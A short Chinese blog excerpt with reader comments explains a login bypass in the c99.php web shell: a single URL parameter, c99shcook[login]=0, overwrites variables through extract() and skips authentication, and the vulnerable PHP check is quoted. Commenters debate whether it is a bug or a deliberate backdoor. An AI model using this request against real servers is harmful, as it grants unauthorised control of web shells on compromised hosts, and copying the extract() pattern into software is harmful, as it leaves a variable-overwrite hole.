From: Every C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!)

C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。

http://127.0.0.1/c99.php?c99shcook[login]=0

可直接登陆。

@extract($_REQUEST["c99shcook"]);

变量覆盖

if ($login) {
    if (empty($md5_pass)) {
        $md5_pass = md5($pass);
    }
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
         if ($login_txt === false) {
            $login_txt = "";
        } elseif (empty($login_txt)) {
            $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html));
         }
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
         header("HTTP/1.0 401 Unauthorized");
        exit($accessdeniedmess);
    }
}

[摘录地址]

留言评论(旧系统):

avak @ 2014-06-27 13:48:45

这验证问题。。。设定文件权限的命令是 chmod。。。然后我辛苦码的留言就全都木有了= = 还有哦,留言下面的返回首页连接点击后直接在iframe里加载首页了,这样真的科学么- -

本站回复:

chmod 是 linux 系统的……留言内容保存草稿功能以后加上~ 额,那个按钮好久了,当时设计的时候是独立的留言页面,后来弄成框架了,也没改~

佚名 @ 2014-07-03 20:48:44

empty惹的祸?$md5_pass其值为0返回true 然后就直接登陆了?

本站回复:

╮(╯_╰)╭

佚名 @ 2014-11-29 20:27:44

重点在extract,提交个login就能绕过登录判断了,赶脚这不是漏洞,是后门

本站回复:

-_-|||